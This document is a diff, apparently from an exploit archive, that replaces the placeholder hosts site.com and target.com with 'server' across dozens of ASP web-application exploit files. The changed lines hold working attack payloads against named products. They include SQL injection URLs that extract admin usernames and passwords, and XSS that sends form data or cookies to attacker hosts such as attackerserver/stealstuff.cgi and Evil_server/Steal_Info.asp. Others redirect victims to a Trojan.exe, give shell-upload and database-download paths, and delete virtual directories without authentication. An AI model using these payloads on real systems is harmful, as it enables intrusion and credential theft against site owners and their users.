 ------------------------------------------
 
 view_article.asp?item=[SQL]
-http://site.com/page.asp?pID=[SQL]
+http://server/page.asp?pID=[SQL]
-http://site.com/display.asp?sortby=sections&sID=[SQL]
+http://server/display.asp?sortby=sections&sID=[SQL]
 
 POC
 ---
 
-http://site.com/view_article.asp?item=1 union select 1 from test.a
+http://server/view_article.asp?item=1 union select 1 from test.a
 
 thanks,
 -p0pc0rn-

platforms/asp/webapps/16953.txt

@@ -5,10 +5,10 @@ Found by: p0pc0rn
 SQL
 ---
 
-http://site.com/page.asp?id=[SQL]
+http://server/page.asp?id=[SQL]
-http://site.com/cat.asp?catid=[SQL]
+http://server/cat.asp?catid=[SQL]
-http://site.com/catin.asp?productid=[SQL]
+http://server/catin.asp?productid=[SQL]
 
 POC
 ---
-http://site.com/page.asp?id=23 union select 1 from test.a
+http://server/page.asp?id=23 union select 1 from test.a

platforms/asp/webapps/17015.txt

@@ -6,7 +6,7 @@
 # Software: Element-IT PowUpload 1.3
 # Software Link: http://www.element-it.com/downloadfile.aspx?type=pow
 # Demo:
-http://site.com/Examples/PowUpload/Simpleupload.htm
+http://server/Examples/PowUpload/Simpleupload.htm
  
 [Comment]
 Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Inyexion,

platforms/asp/webapps/17016.txt

@@ -5,7 +5,7 @@
 # Author Web: www.delincuentedigital.com.ar
 # Software: EAFlashUpload v 2.5
 # Software Link: http://www.easyalgo.com/downloads.aspx#EAFlashUpload
-# Demo: http://www.site.com/examples/eaflashupload/simpleupload.aspx
+# Demo: http://www.server/examples/eaflashupload/simpleupload.aspx
  
 [Comment]
 Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Inyexion,

platforms/asp/webapps/17036.txt

@@ -28,10 +28,10 @@
 #
 # 
 #
-#      [+]http://site.com/default.asp?pid=524'
+#      [+]http://server/default.asp?pid=524'
-#      [+]http://site.com/default.asp?pid=[SQLi]
+#      [+]http://server/default.asp?pid=[SQLi]
-#      [+]http://site.com/viewproduct.asp?PID=130'
+#      [+]http://server/viewproduct.asp?PID=130'
-#      [+]http://site.com/viewproduct.asp?PID=[SQli]
+#      [+]http://server/viewproduct.asp?PID=[SQli]
 #
 #
 #     => PROUD TO BE AN INDIAN | Anythning for INDIA | JAI-HIND | Maa Tujhe Salam

platforms/asp/webapps/1714.txt

@@ -6,7 +6,7 @@
 First you must be logged in
 Then type this in your browser
 
-http://www.site.com/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1
+http://www.server/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1
 
 You will find admin's password
 

platforms/asp/webapps/17228.txt

@@ -12,7 +12,7 @@ Exploit Details :
 
 2- Browse This Link : /forum/pm_show_message.asp?ID=  "it's a message on Your Inbox"
 
-3- Poc: www.site.com//forum/pm_show_message.asp?ID=(inject here)
+3- Poc: www.server//forum/pm_show_message.asp?ID=(inject here)
 ----------------------------------------------------------------
 
 ****** SSMM T34M ******

platforms/asp/webapps/17493.txt

@@ -1,4 +1,4 @@
- Exploit Title: DmxReady Secure Document Library v1.2 SQL Injection
+Exploit Title: DmxReady Secure Document Library v1.2 SQL Injection
 Vulnerability
 # Google Dork: inurl:inc_securedocumentlibrary.asp
 # Date: 03.07.2011

platforms/asp/webapps/1807.txt

@@ -11,8 +11,8 @@ Successful exploitation extracts username and password of administrator in clear
 
 Proof of Concepts:
 --------------------
-site.com/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1'
+server/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1'
-site.com/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1'
+server/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1'
 
 -------
 

platforms/asp/webapps/18394.txt

@@ -1,4 +1,4 @@
-     )   )            )                     (   (         (   (    (       )     ) 
+)   )            )                     (   (         (   (    (       )     ) 
   ( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /( 
   )\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())
  ((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\ 

platforms/asp/webapps/21272.txt

@@ -236,8 +236,8 @@ $hello='
           Website : www.kami.ma
                                  
 Usage>    php knowledgebase0day.php host
-Exemple>  php knowledgebase0day.php kbase.target.com
+Exemple>  php knowledgebase0day.php kbase.server
-Exemple>  php knowledgebase0day.php kbase.target.com /foo
+Exemple>  php knowledgebase0day.php kbase.server /foo
 
 ';
         

platforms/asp/webapps/21455.txt

@@ -5,4 +5,4 @@ Hosting Controller is an application which consolidates all hosting tasks into o
 The DSNManager script does not sufficiently filter dot-dot-slash (../) sequences from URL parameters, making it prone to directory traversal attacks. An attacker can exploit this condition to disclose the contents of arbitrary web-readable files or potentially add a DSN (Data Source Number) to an arbitrary directory. 
 
 http://target/admin/dsn/dsnmanager.asp?DSNAction=ChangeRoot&RootName=D:\webspace\opendnsserver\targ
-et\target.com\db\..\..\..\..\ 
+et\server\db\..\..\..\..\

platforms/asp/webapps/2228.txt

@@ -17,11 +17,11 @@
 ################################################################################
 
 ############################################################################################################################################################
-#Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null FROM T_USERS WHERE id=1 #
+#Usage : http://server/path/comments.asp?id=-1 UNION SELECT ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null FROM T_USERS WHERE id=1 #
 ############################################################################################################################################################
 
 ###########################################################
-#Admin Panel : http://www.target.com/path/admin/login.asp #
+#Admin Panel : http://server/path/admin/login.asp #
 ###########################################################
 
 # milw0rm.com [2006-08-20]

platforms/asp/webapps/2230.txt

@@ -17,11 +17,11 @@
 ################################################################################
 
 ###################################################################################################################
-#Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT 0,username,password,3,4+FROM+LOGIN+WHERE+ID=1 #
+#Usage : http://server/path/comments.asp?id=-1 UNION SELECT 0,username,password,3,4+FROM+LOGIN+WHERE+ID=1 #
 ###################################################################################################################
 
 #################################################
-#Admin Panel : http://www.target.com/path/admin #
+#Admin Panel : http://server/path/admin #
 #################################################
 
 # milw0rm.com [2006-08-20]

platforms/asp/webapps/22673.txt

@@ -17,6 +17,6 @@ Cookie: philboard_admin=True;
 Download the database (users and password):
 
 Usually, the database location can be found and download it from:
-http://www.target.com/database/philboard.mdb
+http://server/database/philboard.mdb
 or
-http://www.target.com/forum/database/philboard.mdb 
+http://server/forum/database/philboard.mdb

platforms/asp/webapps/22866.txt

@@ -4,8 +4,8 @@ A cross-site scripting vulnerability has been reported for ProductCart. The vuln
 
 Exploitation could permit an attacker to steal cookie-based authentication credentials or launch other attacks.
 
-http://www.website.com/ProductCart/pc/msg.asp?message=><script>alert
+http://www.webserver/ProductCart/pc/msg.asp?message=><script>alert
 (document.cookie);</script>
 
-http://www.website.com/ProductCart/pc/msg.asp?message=<iframe%20src="C:\"%
+http://www.webserver/ProductCart/pc/msg.asp?message=<iframe%20src="C:\"%
 20width=400%20height=400></iframe>

platforms/asp/webapps/2287.txt

@@ -9,11 +9,11 @@
 ################################################################################
 
 ##########################################################################################################################################################################
-#Usage : http://www.target.com/path/devam.asp?YID=-1 UNION SELECT null,null,null,null,null,editor_adi,null,editor_sifre,editor_mail,null FROM editor WHERE editor_id = 1 #
+#Usage : http://server/path/devam.asp?YID=-1 UNION SELECT null,null,null,null,null,editor_adi,null,editor_sifre,editor_mail,null FROM editor WHERE editor_id = 1 #
 ##########################################################################################################################################################################
 
 #############################################################
-#Admin Panel : http://www.target.com/path/admin/default.asp #
+#Admin Panel : http://server/path/admin/default.asp #
 #############################################################
 
 # milw0rm.com [2006-09-01]

platforms/asp/webapps/2294.txt

@@ -9,7 +9,7 @@
 #Price of Portal: 300YTL // Good money for Bad Script
 
 #Exploit : 
- www.site.com /[portal path]/kategori.asp?kat=-1%20union%20select%200,U_ADI,2,U_SIFRE,4,5,6,7,8,9,10,11,12,13,14%20from%20uyeler%20where%20U_ID%20like%201
+ www.server /[portal path]/kategori.asp?kat=-1%20union%20select%200,U_ADI,2,U_SIFRE,4,5,6,7,8,9,10,11,12,13,14%20from%20uyeler%20where%20U_ID%20like%201
 
 #BURCU Seni hep sevdim hep sevicem.
 

platforms/asp/webapps/2296.txt

@@ -1,4 +1,4 @@
-                                           _           _        
+_           _        
                                     __   _(_)_ __  ___| |_ __ _ 
                                     \ \ / / | '_ \/ __| __/ _` |
                                      \ V /| | |_) \__ \ || (_| |

platforms/asp/webapps/2306.txt

@@ -9,15 +9,15 @@
 ################################################################################
 
 ##########################################################################################################################################################
-#Username : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_user,null,null,null,null,null,null,null,null FROM adminlogins #
+#Username : http://server/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_user,null,null,null,null,null,null,null,null FROM adminlogins #
 ##########################################################################################################################################################
 
 ##########################################################################################################################################################
-#Password : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_pass,null,null,null,null,null,null,null,null FROM adminlogins #
+#Password : http://server/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_pass,null,null,null,null,null,null,null,null FROM adminlogins #
 ##########################################################################################################################################################
 
 ################################################################
-#Admin Panel : http://www.target.com/path/theadmin/default.asp #
+#Admin Panel : http://server/path/theadmin/default.asp #
 ################################################################
 
 # milw0rm.com [2006-09-05]

platforms/asp/webapps/23571.txt

@@ -17,10 +17,10 @@ SelectSurvey CMS (ASP.NET) Shell Upload Vulnerability
  
     exploit # /survey/UploadImagePopup.aspx
  
-or http://survey.site.com/UploadImagePopup.aspx
+or http://survey.server/UploadImagePopup.aspx
  
  
-  Upload to # http://site.com/UploadedImages/shell.asp
+  Upload to # http://server/UploadedImages/shell.asp
  
  
 #######################################################

platforms/asp/webapps/2362.txt

@@ -6,7 +6,7 @@
 # Vulnerable file : icerik.asp
 
 exp :
-http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1
+http://server/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1
 
 uyeno = 1 or 2( Admin ID )
 

platforms/asp/webapps/2592.htm

@@ -8,7 +8,7 @@
 -->
 <html>
 <body bgcolor="#000000">
-<form method="POST" action="http://www.somesite.com/forum/doprofiledit.asp"><p><b>
+<form method="POST" action="http://www.someserver/forum/doprofiledit.asp"><p><b>
 <font color="#FF0000" face="Verdana" size="2">Email: </font></b>
 <input type="text" name="Email" size="30" value="ajann@ajann.com"><br>
 <font face="Verdana" size="2"><b><font color="#FF0000">Password:</font>:</b></font>

platforms/asp/webapps/26156.txt

@@ -6,4 +6,4 @@ Successful exploitation of this vulnerability could lead to a compromise of the
 
 calculator.asp?cpaint_function=addNumbers&cpaint_argument[]=1&cpaint_argument[]=2")%20%26%20eval("malicious code
 
-http://someserver.com/cpaintfile.asp?cpaint_function=response.write&cpaint_argument[]=2")%20%26%20eval("malicious code 
+http://someserver/cpaintfile.asp?cpaint_function=response.write&cpaint_argument[]=2")%20%26%20eval("malicious code

platforms/asp/webapps/26445.pl

@@ -69,8 +69,8 @@ An attacker can exploit these vulnerabilities to retrieve sensitive and privileg
 # Connection closed by foreign host.
 #
 # exemple:
-# www.site.com/comersus/database/comersus.mdb
+# www.server/comersus/database/comersus.mdb
-# www.site.com/database/comersus.mdb
+# www.server/database/comersus.mdb
 #
 # Decryption vulnerability (all versions)
 # the problem is that comersus encryption tool use
@@ -122,11 +122,11 @@ An attacker can exploit these vulnerabilities to retrieve sensitive and privileg
 # this issues are due to a failure in the application to properly sanitize user-supplied input. an attacker may exploit this vulnerability
 # to have arbitrary script code executed in the browser
 # blackofficeelite:
-# www.target.com/comersus/backofficelite/comersus_backoffice_message.asp?message=<script>alert('vul');</script>
+# server/comersus/backofficelite/comersus_backoffice_message.asp?message=<script>alert('vul');</script>
 # or blackofficeplus
-# www.target.com/comersus/backofficeplus/comersus_backoffice_message.asp?message=<script>alert('vul');</script>
+# server/comersus/backofficeplus/comersus_backoffice_message.asp?message=<script>alert('vul');</script>
 #
-# www.target.com/comersus/backofficePlus/comersus_backoffice_supportError.asp?error=<script>alert('vul');</script>
+# server/comersus/backofficePlus/comersus_backoffice_supportError.asp?error=<script>alert('vul');</script>
 #
 # i wrote the following code for testing and educational
 # purposes, use it at your own risk and on your own machine

platforms/asp/webapps/2662.txt

@@ -24,10 +24,10 @@ Bugs are available in "DisableForum.asp" and "enableForum.asp" in forum director
 Exploit: (or POC)
 --------------------
 1- unAuthenticated user can delete every sites virtual directory on hc sites by forum!
-/forum/HCSpecific/DisableForum.asp?action=disableforum&WSiteName=testsite.com&VDirName=test&ForumID=1
+/forum/HCSpecific/DisableForum.asp?action=disableforum&WSiteName=testserver&VDirName=test&ForumID=1
 -----------------------------------------------------------------
 2- unAuthenticated user can make forum virtual directory (with the desire name) for everysites on hc by forum!
-/forum/HCSpecific/EnableForum.asp?action=enableforum&WSiteName=testsite.com&VDirName=test&ForumID=
+/forum/HCSpecific/EnableForum.asp?action=enableforum&WSiteName=testserver&VDirName=test&ForumID=
 -----------------------------------------------------------------
 3- unAuthenticated user can disable all hc forums by SQL_Injection
 /forum/HCSpecific/DisableForum.asp?action=disableforum&ForumID=1 or 1=1

platforms/asp/webapps/2782.txt

@@ -10,7 +10,7 @@ passwd:       'or''='
 
 injection sql (post) :
 
-http://site.com/search_list.asp
+http://server/search_list.asp
 variables:
 Hpecs_Find=maingroup&searchstring='[sql]
  ( or just post your query in the search engine ... )

platforms/asp/webapps/28062.txt

@@ -4,4 +4,4 @@ Cisco CallManager is prone to a cross-site scripting vulnerability. This issue i
  
 An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting administrative user in the context of the affected site. This may help the attacker launch other attacks.
 
-http://www.example.com/CallManagerAddress/ccmuser/logon.asp?userID=&password=&MadeUpParameter="><script>for (i=0; i<document.forms.length; i%2B%2B) document.forms[i].action="http://www.attackersite.com/stealstuff.cgi";</script><!--
+http://www.example.com/CallManagerAddress/ccmuser/logon.asp?userID=&password=&MadeUpParameter="><script>for (i=0; i<document.forms.length; i%2B%2B) document.forms[i].action="http://www.attackerserver/stealstuff.cgi";</script><!--

platforms/asp/webapps/29024.txt

@@ -4,6 +4,6 @@ Inventory Manager is prone to multiple input-validation vulnerabilities, includi
 
 Successful exploits of these vulnerabilities could allow an attacker to compromise the application, access or modify data, steal cookie-based authentication credentials, or even exploit vulnerabilities in the underlying database implementation. Other attacks are also possible.
 
-http://site.com/inventory/inventory/display/imager.asp?pictable='[sql]
+http://server/inventory/inventory/display/imager.asp?pictable='[sql]
-http://site.com/inventory/inventory/display/imager.asp?pictable=[inventory]&picfield=[sql]
+http://server/inventory/inventory/display/imager.asp?pictable=[inventory]&picfield=[sql]
-http://site.com/inventory/inventory/display/imager.asp?pictable=[inventory &picfield=photo&where='[sql]
+http://server/inventory/inventory/display/imager.asp?pictable=[inventory &picfield=photo&where='[sql]

platforms/asp/webapps/29500.txt

@@ -14,8 +14,8 @@ Google Dork: allinurl:RASPcalendar "powered by RASPcalendar"
 ------------------------------------------------------------
 
 Example  : http://www.usfim.it/RASPcalendar/
-         : http://site.com/events
+         : http://server/events
-         : http://site.com/calendar
+         : http://server/calendar
          : etc...
 
 Go to    : http://www.usfim.it/RASPcalendar/admin/

platforms/asp/webapps/30204.txt

@@ -8,4 +8,4 @@ The attacker may also leverage this issue to execute arbitrary code in the brows
  
 Comersus Cart 7.0.7 is vulnerable; other versions may also be affected. 
 
-http://www.example.com/path/store/comersus_customerAuthenticateForm.asp?redirectUrl="><script>window.location="http://www.Evil_Site.com/Trojan.exe"</script>
+http://www.example.com/path/store/comersus_customerAuthenticateForm.asp?redirectUrl="><script>window.location="http://www.Evil_server/Trojan.exe"</script>

platforms/asp/webapps/30205.txt

@@ -8,4 +8,4 @@ The attacker may also leverage this issue to execute arbitrary code in the brows
   
 Comersus Cart 7.0.7 is vulnerable; other versions may also be affected. 
 
-http://www.example.com/path/store/comersus_message.asp?message=<script src=http://www.Site.com/Evil_Script.js></script> http://www.example.com/path/store/comersus_message.asp?message=<form%20action="http://www.Evil_Site.com/Steal_Info.asp"%20method="post">Username:<input%20name="username"%20type="text"%20maxlength="10"><br>Password:<input%20name="password"%2 0type="text"%20maxlength="10"><br><input%20name="login"%20type="submit"%20value ="Login"></form> 
+http://www.example.com/path/store/comersus_message.asp?message=<script src=http://www.server/Evil_Script.js></script> http://www.example.com/path/store/comersus_message.asp?message=<form%20action="http://www.Evil_server/Steal_Info.asp"%20method="post">Username:<input%20name="username"%20type="text"%20maxlength="10"><br>Password:<input%20name="password"%2 0type="text"%20maxlength="10"><br><input%20name="login"%20type="submit"%20value ="Login"></form>

platforms/asp/webapps/32157.txt

@@ -11,7 +11,7 @@ This vulnerability is an unprotected page on the site where you can view
 all current users and usernames.
 To find out if a Kentico CMS is vulnerable go to
 
-http://site.com/CMSModules/Messaging/CMSPages/PublicMessageUserSelector.aspx
+http://server/CMSModules/Messaging/CMSPages/PublicMessageUserSelector.aspx
 
 assuming that the Kentico CMS was installed to the root folder in the
 server.

platforms/asp/webapps/3233.txt

@@ -6,7 +6,7 @@
 ###############################################################
 #Download Link Of Fullaspsite Asp Hosting Sitesi (tr) :
 http://www.aspindir.com/Goster/4383
-#Demo : http://aspsiteler.fullaspsite.com/hosting
+#Demo : http://aspsiteler.fullaspserver/hosting
 
 #Exploit;
 #Admin Nick, Passport;

platforms/asp/webapps/32660.txt

@@ -11,4 +11,3 @@
         
 
 
- 

platforms/asp/webapps/3339.txt

@@ -11,7 +11,7 @@ Bulan: xoron
 Download:  http://www.aspindir.com/Goster/3439
 
 -----------------------------------------------------------------------
-Exploit: http://www.target.com/ page.asp?art_id=[SQL]
+Exploit: http://server/ page.asp?art_id=[SQL]
 
 Username: page.asp?art_id=-1+union+select+0,Name,2,3,4,5,6,7,8,9+from+Users+where+id=1
 

platforms/asp/webapps/3466.txt

@@ -8,7 +8,7 @@
 #####################################
 -------
 Exploit :
-http://www.Site.Com/Path/default.asp?layout=-1%20%20union%20select%201,fldauthorusername,fldauthorpassword,1,1,1,1%20from%20tblauthor%20where%201=1
+http://www.server/Path/default.asp?layout=-1%20%20union%20select%201,fldauthorusername,fldauthorpassword,1,1,1,1%20from%20tblauthor%20where%201=1
 Admin Panel : admin_default.asp
 
 # milw0rm.com [2007-03-12]

platforms/asp/webapps/34753.py

@@ -29,7 +29,7 @@ if len(sys.argv) < 2:
     print "|                                                                    |"
     print "|   Onlineon E-Ticaret Database Disclosure Exploit (.py)             |"
     print "|   ZoRLu / milw00rm.com                                             |"
-    print "|   exploit.py http://site.com/path/                                 |"
+    print "|   exploit.py http://server/path/                                 |"
     print "|____________________________________________________________________|"
     sys.exit(1)
   

platforms/asp/webapps/37892.txt

@@ -1,4 +1,4 @@
-                .__        _____        _______                
+.__        _____        _______                
                 |  |__    /  |  |___  __\   _  \_______   ____ 
                 |  |  \  /   |  |\  \/  /  /_\  \_  __ \_/ __ \
                 |   Y  \/    ^   />    <\  \_/   \  | \/\  ___/